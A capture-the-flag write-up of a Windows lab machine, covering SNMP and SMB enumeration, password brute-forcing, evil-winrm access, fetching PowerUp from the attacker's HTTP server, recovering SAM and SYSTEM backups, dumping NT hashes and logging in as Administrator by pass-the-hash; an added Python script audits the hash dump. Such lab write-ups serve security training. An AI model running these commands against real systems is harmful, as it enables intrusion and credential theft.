CTF Year of the Owl

  1. rustscan
  2. SNMP SCAN
  3. smb crack
  4. Browse the SMB
  5. List smb shares
  6. evil-winrm
  7. Privesc
  8. Dump the hashes
  9. Use the admin hash

rustscan

rustscan -a 10.10.33.184 --ulimit 5000
PORT      STATE SERVICE       REASON
80/tcp    open  http          syn-ack
139/tcp   open  netbios-ssn   syn-ack
443/tcp   open  https         syn-ack
445/tcp   open  microsoft-ds  syn-ack
3389/tcp  open  ms-wbt-server syn-ack
5985/tcp  open  wsman         syn-ack
47001/tcp open  winrm         syn-ack

SNMP SCAN

To find the community string:

onesixtyone 10.10.33.184 -c /usr/share/wordlists/seclists/Discovery/SNMP/snmp-onesixtyone.txt


The community string is openview.

https://github.com/Kitsun3Sec/Pentest-Cheat-Sheets
This MIB (1.3.6.1.4.1.77.1.2.25, taken from the cheat sheet above) lists the local user accounts.

snmpwalk -c openview -v1 10.10.33.184 1.3.6.1.4.1.77.1.2.25


The user found is Jareth.

smb crack

Now we can crack the SMB password for this user.

crackmapexec smb 10.10.33.184 -u Jareth -p /usr/share/wordlists/seclists/Passwords/Leaked-Databases/rockyou.txt


The password is sarah.

Browse the SMB

smbclient -L //10.10.33.184 -U Jareth


There is nothing interesting.

List smb shares

python /usr/bin/smbmap.py -R -u "Jareth" -p "sarah" -H 10.10.33.184

evil-winrm

evil-winrm -u Jareth -p sarah -i 10.10.131.77

Privesc

We are going to use PowerUp.ps1.

On Linux:

python -m http.server 8000

On Windows:

Invoke-WebRequest -Uri http://10.8.50.167:8000/powerup.ps1 -OutFile powerup.ps1

Checklist:
https://book.hacktricks.xyz/windows-hardening/checklist-windows-privilege-escalation

cd /
cd 'C:\$Recycle.Bin'
C:\$Recycle.Bin> dir -force


Inside the directory we find sam.bak and system.bak (backups of the SAM and SYSTEM registry hives).

We download them.
It was impossible to download them while they were still in the Recycle Bin, so we first copy them into the user's Documents folder.

copy sam.bak "C:/Users/Jareth/Documents/sam.bak"
copy system.bak "C:/Users/Jareth/Documents/system.bak"

download sam.bak /tmp/sam.bak
download system.bak /tmp/system.bak


I move them into my working directory.

mv /tmp/*.bak .

Dump the hashes

secretsdump.py -sam sam.bak -system system.bak LOCAL

Output:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:6bc99ede9edcfecf9662fb0c0ddcfa7a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:39a21b273f0cfd3d1541695564b4511b:::
Jareth:1001:aad3b435b51404eeaad3b435b51404ee:5a6103a83d2a94be8fd17161dfd4555a:::
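The secretsdump.py output above is in pwdump format (user:RID:LM hash:NT hash:::). As an added example, not part of the original writeup, the following Python script parses such a dump and flags what a defender reviewing it should notice: the built-in Administrator (RID 500), accounts whose NT hash is the hash of an empty password, accounts that still have an LM hash stored, and accounts sharing the same password. The sample input is the dump printed above; the empty-hash constants are well-known values, not taken from this machine.

```python
"""Audit a secretsdump/pwdump-style SAM listing for weak credential hygiene.

Added example (not part of the original writeup). Input lines follow the
user:rid:lmhash:nthash::: format that secretsdump.py prints.
"""
import re
from collections import defaultdict

# Well-known constants: the LM field when no LM hash is stored, and the
# NT hash of an empty password. Not machine-specific values.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

LINE_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::",
    re.IGNORECASE,
)

# Sample input: the dump printed by secretsdump.py earlier in this writeup.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6bc99ede9edcfecf9662fb0c0ddcfa7a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:39a21b273f0cfd3d1541695564b4511b:::
Jareth:1001:aad3b435b51404eeaad3b435b51404ee:5a6103a83d2a94be8fd17161dfd4555a:::
"""


def parse_pwdump(text):
    """Return a list of dicts (user, rid, lm, nt); non-matching lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            d = m.groupdict()
            d["rid"] = int(d["rid"])
            d["lm"] = d["lm"].lower()
            d["nt"] = d["nt"].lower()
            entries.append(d)
    return entries


def audit(entries):
    """Return {user: [finding, ...]} for accounts that deserve a closer look."""
    findings = defaultdict(list)
    by_nt = defaultdict(list)
    for e in entries:
        by_nt[e["nt"]].append(e["user"])
        if e["rid"] == 500:
            findings[e["user"]].append(
                "built-in Administrator (RID 500): its NT hash alone is reusable for pass-the-hash"
            )
        if e["nt"] == EMPTY_NT:
            findings[e["user"]].append("NT hash of an empty password")
        if e["lm"] != EMPTY_LM:
            findings[e["user"]].append("LM hash stored (legacy, trivially crackable)")
    # Identical NT hashes mean identical passwords (the NT hash is unsalted).
    for nt, users in by_nt.items():
        if nt != EMPTY_NT and len(users) > 1:
            for u in users:
                others = ", ".join(x for x in users if x != u)
                findings[u].append("same password as: " + others)
    return dict(findings)


def audit_dump(text):
    """Convenience wrapper: parse and audit in one call."""
    return audit(parse_pwdump(text))


if __name__ == "__main__":
    for user, notes in audit_dump(SAMPLE_DUMP).items():
        for note in notes:
            print(f"{user}: {note}")
```

On the dump above this reports only Administrator (RID 500), Guest and DefaultAccount (empty-password NT hash); Guest and DefaultAccount are not reported as sharing a password because the empty hash is excluded from the reuse check. The same check applied to a full domain dump is a quick way to find password reuse between privileged and unprivileged accounts.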

Use the admin hash

evil-winrm -u Administrator -H 6bc99ede9edcfecf9662fb0c0ddcfa7a -i 10.10.131.77

Yeah!